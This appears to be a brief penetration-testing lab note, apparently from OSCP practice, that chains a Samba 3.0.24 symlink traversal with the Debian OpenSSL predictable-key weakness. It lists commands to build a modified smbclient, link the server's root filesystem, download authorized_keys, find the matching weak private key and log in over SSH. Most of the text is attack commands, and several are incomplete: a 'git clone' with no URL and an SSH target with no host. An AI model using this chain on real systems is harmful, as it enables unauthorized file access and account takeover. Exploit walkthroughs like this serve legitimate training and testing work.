Symlink and Debian OpenSSL Predictable PRNG

# With samba 3.0.24 exploit - symlink, attacker can access to the directory outside the Samba root directory. 

# Kali 
tar xvfz samba-3.4.5.tar.gz
cd samba-3.4.5/source3/client/
mv client.c client.c.bak

# Compile
cd samba-3.4.5/source3
./configure --prefix=/home/iptracej/oscp/lab/
make && make install

# Configure and access to the share
export  LD_LIBRARY_PATH="$LD_LIBRARY_PATH:/home/iptracej/oscp/lab/"

# access to the share and rootfs
cd bin
./smbclient \\\\\\'Bob Share' -u bob -N --option='client min protocol=NT1'
symlink / rootfs

# Find authorized key

# Get the keys
mget authorized_keys 

Debian OpenSSL Predictable PRNG

git clone
cd debian-ssh
cd common_keys
tar jxf debian_ssh_rsa_2048_x86.tar.bz2

# Find a ssh key pair with the previous public key in authorized_keys file
grep -lr <public key>
# debian-ssh/common_keys/dsa/1024/

# Modify the authorized_keys file in victim machine

# connect to the victim machine via ssh 
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-dss -i debian-ssh/common_keys/dsa/1024/f1fb2162a02f0f7c40c210e6167f05ca-16858 bob@

Last updated